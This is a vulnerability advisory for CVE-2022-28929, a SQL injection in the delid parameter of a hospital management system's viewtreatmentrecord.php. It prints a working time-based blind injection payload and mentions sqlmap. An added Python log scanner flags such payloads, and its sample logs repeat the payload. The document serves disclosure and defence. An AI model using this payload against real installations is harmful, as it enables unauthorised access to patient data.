CVE-2022-28929: vulnerabilitys/HMS at main · cyberhomeless/vulnerabilitys
Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the delid parameter at viewtreatmentrecord.php.
**DATE : 4/6/22**
**Web App : https://github.com/kabirkhyrul/HMS**
**Version : 1.0**
**Researcher : cyber_homeless**
**Path : viewtreatmentrecord.php?delid=1**
**Security issue : SQL Injection**

While installing the web app I saw a bunch of SQL connections, so I went for SQL injection and soon enough found one:
Exploiting this vulnerability is pretty easy now using sqlmap:
Payload : 1' AND (SELECT 6895 FROM (SELECT(SLEEP(5)))juDk) AND 'GPzW'='GPzW
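For defenders running this application, the following added example (not part of the original advisory or the HMS code base) scans web server access logs for requests to viewtreatmentrecord.php whose delid value is not a plain integer. It assumes combined log format with query strings logged and that legitimate delid values are numeric record ids, as in the path shown above; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Apr/2022:10:00:01 +0000] "GET /viewtreatmentrecord.php?delid=12 HTTP/1.1" 200 512 "-" "-"
192.0.2.77 - - [06/Apr/2022:10:00:05 +0000] "GET /viewtreatmentrecord.php?delid=1%27%20AND%20%28SELECT%206895%20FROM%20%28SELECT%28SLEEP%285%29%29%29juDk%29%20AND%20%27GPzW%27%3D%27GPzW HTTP/1.1" 200 512 "-" "-"
192.0.2.10 - - [06/Apr/2022:10:00:09 +0000] "GET /viewpatient.php?id=3 HTTP/1.1" 200 2048 "-" "-"
192.0.2.77 - - [06/Apr/2022:10:00:12 +0000] "GET /HMS/viewtreatmentrecord.php?delid=7&delid=7+OR+1 HTTP/1.1" 200 512 "-" "-"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
TARGET_SCRIPT = "viewtreatmentrecord.php"
# Assumption: a legitimate delid is a short decimal record id.
VALID_ID = re.compile(r"[0-9]{1,10}")


def suspicious_delid(target):
    """Return every URL-decoded delid value in the request target that is not a plain integer."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + TARGET_SCRIPT):
        return []
    # parse_qs URL-decodes values and keeps repeated parameters, so a benign
    # first delid cannot hide a second one; empty values are flagged too.
    values = parse_qs(parts.query, keep_blank_values=True).get("delid", [])
    return [v for v in values if not VALID_ID.fullmatch(v)]


def scan(log_text):
    """Return (client_ip, timestamp, bad_values) for each flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        bad = suspicious_delid(m["target"])
        if bad:
            findings.append((m["ip"], m["ts"], bad))
    return findings


if __name__ == "__main__":
    for ip, ts, bad in scan(SAMPLE_LOG):
        print(ip, ts, bad)
```

The same integer check applied server-side, together with a parameterized query, is the corresponding fix; this scan only sees parameters that appear in the logged URL, not request bodies.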